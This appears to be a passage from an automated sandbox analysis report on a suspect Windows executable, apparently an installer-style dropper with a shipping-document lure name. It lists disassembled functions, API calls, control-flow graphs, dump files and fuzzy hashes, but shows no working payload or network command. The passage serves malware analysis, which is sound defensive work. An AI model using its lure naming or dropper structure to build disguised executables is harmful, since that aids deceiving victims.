                                                      • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                      • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                      • GetClientRect.USER32(?,?), ref: 004058F0
                                                      • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                      • ShowWindow.USER32(?,00000008), ref: 00405993
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                      • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405A1B
                                                      • ShowWindow.USER32(00000000), ref: 00405A3F
                                                      • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                      • ShowWindow.USER32(00000008), ref: 00405A8E
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                      • CreatePopupMenu.USER32 ref: 00405AD3
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                      • GetWindowRect.USER32(?,?), ref: 00405B07
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                      • OpenClipboard.USER32(00000000), ref: 00405B68
                                                      • EmptyClipboard.USER32 ref: 00405B6E
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                      • CloseClipboard.USER32 ref: 00405BC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                      • String ID: H/B${$m
                                                      • API String ID: 4154960007-2438130757
                                                      • Opcode ID: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                      • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                      • Opcode Fuzzy Hash: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                      • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 515 405d8e-405db4 call 406059 518 405db6-405dc8 DeleteFileW 515->518 519 405dcd-405dd4 515->519 520 405f4a-405f4e 518->520 521 405dd6-405dd8 519->521 522 405de7-405df7 call 406682 519->522 523 405ef8-405efd 521->523 524 405dde-405de1 521->524 528 405e06-405e07 call 405f9d 522->528 529 405df9-405e04 lstrcatW 522->529 523->520 527 405eff-405f02 523->527 524->522 524->523 530 405f04-405f0a 527->530 531 405f0c-405f14 call 4069df 527->531 532 405e0c-405e10 528->532 529->532 530->520 531->520 539 405f16-405f2a call 405f51 call 405d46 531->539 535 405e12-405e1a 532->535 536 405e1c-405e22 lstrcatW 532->536 535->536 538 405e27-405e43 lstrlenW FindFirstFileW 535->538 536->538 540 405e49-405e51 538->540 541 405eed-405ef1 538->541 555 405f42-405f45 call 405707 539->555 556 405f2c-405f2f 539->556 545 405e71-405e85 call 406682 540->545 546 405e53-405e5b 540->546 541->523 544 405ef3 541->544 544->523 557 405e87-405e8f 545->557 558 405e9c-405ea7 call 405d46 545->558 549 405ed0-405ee0 FindNextFileW 546->549 550 405e5d-405e65 546->550 549->540 554 405ee6-405ee7 FindClose 549->554 550->545 551 405e67-405e6f 550->551 551->545 551->549 554->541 555->520 556->530 559 405f31-405f40 call 405707 call 406442 556->559 557->549 560 405e91-405e9a call 405d8e 557->560 568 405ec8-405ecb call 405707 558->568 569 405ea9-405eac 558->569 559->520 560->549 568->549 572 405ec0-405ec6 569->572 573 405eae-405ebe call 405707 call 406442 569->573 572->549 573->549
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 00405DB7
                                                      • lstrcatW.KERNEL32(00424F50,\*.*), ref: 00405DFF
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E22
                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 00405E28
                                                      • FindFirstFileW.KERNELBASE(00424F50,?,?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 00405E38
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                      • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                      Strings
                                                      • "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", xrefs: 00405D97
                                                      • POB, xrefs: 00405DE7
                                                      • \*.*, xrefs: 00405DF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$POB$\*.*
                                                      • API String ID: 2035342205-3595412467
                                                      • Opcode ID: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
                                                      • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                      • Opcode Fuzzy Hash: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
                                                      • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 681 406da0-406da5 682 406e16-406e34 681->682 683 406da7-406dd6 681->683 684 40740c-407421 682->684 685 406dd8-406ddb 683->685 686 406ddd-406de1 683->686 690 407423-407439 684->690 691 40743b-407451 684->691 687 406ded-406df0 685->687 688 406de3-406de7 686->688 689 406de9 686->689 693 406df2-406dfb 687->693 694 406e0e-406e11 687->694 688->687 689->687 692 407454-40745b 690->692 691->692 697 407482-40748e 692->697 698 40745d-407461 692->698 695 406e00-406e0c 693->695 696 406dfd 693->696 699 406fe3-407001 694->699 703 406e76-406ea4 695->703 696->695 706 406c24-406c2d 697->706 704 407610-40761a 698->704 705 407467-40747f 698->705 701 407003-407017 699->701 702 407019-40702b 699->702 710 40702e-407038 701->710 702->710 708 406ec0-406eda 703->708 709 406ea6-406ebe 703->709 707 407626-407639 704->707 705->697 714 406c33 706->714 715 40763b 706->715 716 40763e-407642 707->716 711 406edd-406ee7 708->711 709->711 712 40703a 710->712 713 406fdb-406fe1 710->713 718 406eed 711->718 719 406e5e-406e64 711->719 720 406fb6-406fba 712->720 721 40714b-407158 712->721 713->699 717 406f7f-406f89 713->717 722 406c3a-406c3e 714->722 723 406d7a-406d9b 714->723 724 406cdf-406ce3 714->724 725 406d4f-406d53 714->725 715->716 728 4075ce-4075d8 717->728 729 406f8f-406fb1 717->729 739 406e43-406e5b 718->739 740 4075aa-4075b4 718->740 730 406f17-406f1d 719->730 731 406e6a-406e70 719->731 732 406fc0-406fd8 720->732 733 4075c2-4075cc 720->733 721->706 737 4071a7-4071b6 721->737 722->707 738 406c44-406c51 722->738 723->684 735 406ce9-406d02 724->735 736 40758f-407599 724->736 726 406d59-406d6d 725->726 727 40759e-4075a8 725->727 741 406d70-406d78 726->741 727->707 728->707 729->721 742 406f7b 730->742 743 406f1f-406f3d 730->743 731->703 731->742 732->713 733->707 745 406d05-406d09 735->745 736->707 737->684 738->715 744 406c57-406c9d 738->744 739->719 740->707 741->723 741->725 742->717 749 406f55-406f67 743->749 750 406f3f-406f53 743->750 746 406cc5-406cc7 744->746 747 406c9f-406ca3 744->747 745->724 748 406d0b-406d11 745->748 754 406cd5-406cdd 746->754 755 406cc9-406cd3 746->755 752 406ca5-406ca8 GlobalFree 747->752 753 406cae-406cbc GlobalAlloc 747->753 756 406d13-406d1a 748->756 757 406d3b-406d4d 748->757 751 406f6a-406f74 749->751 750->751 751->730 758 406f76 751->758 752->753 753->715 759 406cc2 753->759 754->745 755->754 755->755 760 406d25-406d35 GlobalAlloc 756->760 761 406d1c-406d1f GlobalFree 756->761 757->741 763 4075b6-4075c0 758->763 764 406efc-406f14 758->764 759->746 760->715 760->757 761->760 763->707 764->730
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                      • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                      • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                      • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004069DF Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                      • FindClose.KERNEL32(00000000), ref: 004069F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                      • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                      • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                      • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404102 Relevance: 63.4, APIs: 34, Strings: 2, Instructions: 357windowstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 202 404102-404114 203 40411a-404120 202->203 204 40427b-40428a 202->204 203->204 205 404126-40412f 203->205 206 4042d9-4042ee 204->206 207 40428c-4042d4 GetDlgItem * 2 call 404601 SetClassLongW call 40140b 204->207 210 404131-40413e SetWindowPos 205->210 211 404144-40414b 205->211 208 4042f0-4042f3 206->208 209 40432e-404333 call 40464d 206->209 207->206 213 4042f5-404300 call 401389 208->213 214 404326-404328 208->214 221 404338-404353 209->221 210->211 216 40414d-404167 ShowWindow 211->216 217 40418f-404195 211->217 213->214 238 404302-404321 SendMessageW 213->238 214->209 220 4045ce 214->220 222 404268-404276 call 404668 216->222 223 40416d-404180 GetWindowLongW 216->223 224 404197-4041a9 DestroyWindow 217->224 225 4041ae-4041b1 217->225 227 4045d0-4045d7 220->227 234 404355-404357 call 40140b 221->234 235 40435c-404362 221->235 222->227 223->222 236 404186-404189 ShowWindow 223->236 228 4045ab-4045b1 224->228 230 4041b3-4041bf SetWindowLongW 225->230 231 4041c4-4041ca 225->231 228->220 241 4045b3-4045b9 228->241 230->227 231->222 237 4041d0-4041df GetDlgItem 231->237 234->235 242 404368-404373 235->242 243 40458c-4045a5 DestroyWindow EndDialog 235->243 236->217 244 4041e1-4041f8 SendMessageW IsWindowEnabled 237->244 245 4041fe-404201 237->245 238->227 241->220 246 4045bb-4045c4 ShowWindow 241->246 242->243 247 404379-4043c6 call 4066bf call 404601 * 3 GetDlgItem 242->247 243->228 244->220 244->245 249 404203-404204 245->249 250 404206-404209 245->250 246->220 274 4043d0-40440c ShowWindow KiUserCallbackDispatcher call 404623 EnableWindow 247->274 275 4043c8-4043cd 247->275 252 404234-404239 call 4045da 249->252 253 404217-40421c 250->253 254 40420b-404211 250->254 252->222 257 404252-404262 SendMessageW 253->257 259 40421e-404224 253->259 254->257 258 404213-404215 254->258 257->222 258->252 262 404226-40422c call 40140b 259->262 263 40423b-404244 call 40140b 259->263 272 404232 262->272 263->222 271 404246-404250 263->271 271->272 272->252 278 404411 274->278 279 40440e-40440f 274->279 275->274 280 404413-404441 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404443-404454 SendMessageW 280->281 282 404456 280->282 283 40445c-40449b call 404636 call 4040e3 call 406682 lstrlenW call 4066bf SetWindowTextW call 401389 281->283 282->283 283->221 294 4044a1-4044a3 283->294 294->221 295 4044a9-4044ad 294->295 296 4044cc-4044e0 DestroyWindow 295->296 297 4044af-4044b5 295->297 296->228 298 4044e6-404513 CreateDialogParamW 296->298 297->220 299 4044bb-4044c1 297->299 298->228 301 404519-404570 call 404601 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->301 299->221 300 4044c7 299->300 300->220 301->220 306 404572-404585 ShowWindow call 40464d 301->306 308 40458a 306->308 308->228
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                      • ShowWindow.USER32(?), ref: 0040415E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                      • ShowWindow.USER32(?,00000004), ref: 00404189
                                                      • DestroyWindow.USER32 ref: 0040419D
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                      • GetDlgItem.USER32(?,?), ref: 004041D5
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                      • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                      • GetDlgItem.USER32(?,00000001), ref: 0040429B
                                                      • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
                                                      • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                      • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043E9
                                                      • EnableWindow.USER32(?,?), ref: 00404404
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
                                                      • EnableMenuItem.USER32(00000000), ref: 00404421
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                      • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                      • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                      • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: H/B$m
                                                      • API String ID: 121052019-3763849374
                                                      • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                      • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                      • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                      • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 309 403d54-403d6c call 406a76 312 403d80-403db7 call 406550 309->312 313 403d6e-403d7e call 4065c9 309->313 318 403db9-403dca call 406550 312->318 319 403dcf-403dd5 lstrcatW 312->319 322 403dda-403e03 call 40402a call 406059 313->322 318->319 319->322 327 403e95-403e9d call 406059 322->327 328 403e09-403e0e 322->328 334 403eab-403ed0 LoadImageW 327->334 335 403e9f-403ea6 call 4066bf 327->335 328->327 329 403e14-403e3c call 406550 328->329 329->327 336 403e3e-403e42 329->336 338 403f51-403f59 call 40140b 334->338 339 403ed2-403f02 RegisterClassW 334->339 335->334 340 403e54-403e60 lstrlenW 336->340 341 403e44-403e51 call 405f7e 336->341 350 403f63-403f6e call 40402a 338->350 351 403f5b-403f5e 338->351 342 404020 339->342 343 403f08-403f4c SystemParametersInfoW CreateWindowExW 339->343 347 403e62-403e70 lstrcmpiW 340->347 348 403e88-403e90 call 405f51 call 406682 340->348 341->340 346 404022-404029 342->346 343->338 347->348 354 403e72-403e7c GetFileAttributesW 347->354 348->327 362 403f74-403f8e ShowWindow call 406a06 350->362 363 403ff7-403ff8 call 4057da 350->363 351->346 357 403e82-403e83 call 405f9d 354->357 358 403e7e-403e80 354->358 357->348 358->348 358->357 370 403f90-403f95 call 406a06 362->370 371 403f9a-403fac GetClassInfoW 362->371 366 403ffd-403fff 363->366 368 404001-404007 366->368 369 404019-40401b call 40140b 366->369 368->351 372 40400d-404014 call 40140b 368->372 369->342 370->371 375 403fc4-403fe7 DialogBoxParamW call 40140b 371->375 376 403fae-403fbe GetClassInfoW RegisterClassW 371->376 372->351 380 403fec-403ff5 call 403ca4 375->380 376->375 380->346
                                                      APIs
                                                        • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                        • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                      • lstrcatW.KERNEL32(1033,00422F48), ref: 00403DD5
                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420), ref: 00403E55
                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403E73
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238), ref: 00403EBC
                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                      • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                      • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                      • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                      • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
